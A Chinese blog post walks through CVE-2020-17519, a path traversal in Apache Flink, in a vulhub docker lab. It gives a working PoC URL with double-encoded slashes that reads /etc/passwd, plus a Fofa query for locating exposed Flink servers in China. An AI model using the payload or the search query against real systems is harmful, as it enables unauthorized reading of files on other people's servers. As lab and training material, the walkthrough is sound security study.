前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Apache Flink路径遍历 (CVE-2020-17519)

Apache Flink路径遍历 (CVE-2020-17519)

作者头像
网e渗透安全部
发布2022-06-15 11:37:32
4710
发布2022-06-15 11:37:32
举报
文章被收录于专栏:白安全组

前言说明:

Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力。

Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件。

Fofa语句查询:

country="CN" && js_name="runtime.0dcf16aad31edd73d8e8.js"

漏洞存在占比大概十分之六(按搜索出的单页面统计)

正文:

环境搭建:

我们使用vulhub进行环境搭建,具体漏洞打开目录:

代码语言:javascript
复制
/vulhub-master/flink/CVE-2020-17519

开启命令:

代码语言:javascript
复制
docker-compose up -d

打开成功后访问http://192.168.0.110:8081/#/submit即可红色部分换成你自己的靶机IP

这样即可完成搭建工作

漏洞利用:

利用方式很简单,直接构建poc

代码语言:javascript
复制
http://192.168.0.110:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

IP换成你自己的即可,读取网站中/etc/passwd目录

这里对%252f解释一下,这个是对/进行url编码加密两次后的值

参考文章:

https://vulhub.org/#/environments/flink/CVE-2020-17519/

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-05-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言说明:
  • Fofa语句查询:
  • 正文:
    • 环境搭建:
      • 漏洞利用:
        • 参考文章:
        相关产品与服务
        容器服务
        腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档